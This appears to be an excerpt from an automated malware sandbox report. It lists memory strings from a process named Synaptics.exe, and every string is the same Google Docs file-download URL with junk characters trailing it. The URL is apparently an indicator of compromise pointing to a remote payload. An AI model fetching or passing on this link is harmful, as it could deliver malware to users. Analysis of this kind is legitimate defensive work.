                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddG
                              Source: Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddate
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadding:y
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddj8N%
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade3
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadel
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden3
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                              Source: Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadess
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet7
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetX
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf8
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg)
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgC
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadglN
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgp
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs0
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138173802.000000000561A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhC
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh_:O
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhi6
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhq3
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi=
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiG
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadig
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadij
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin/
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadio
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadive.zB
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiy
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjk
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadki
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl=
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlF
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadli
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadliM=
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadll
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.tr
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm/F/
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmaO
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne-bl
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniK
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnl
                              Source: Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadns
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadntent?
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado)FO
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoB
                              Source: Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadodel=
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog$
                              Source: Synaptics.exe, 00000003.00000002.2699912617.000000001D818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoj
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorc
                              Source: Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadort=d
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou4
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2651567161.000000000C0FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2651115505.000000000BD3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp.c
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpsP
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqB
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrC
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadri
                              Source: Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrigin
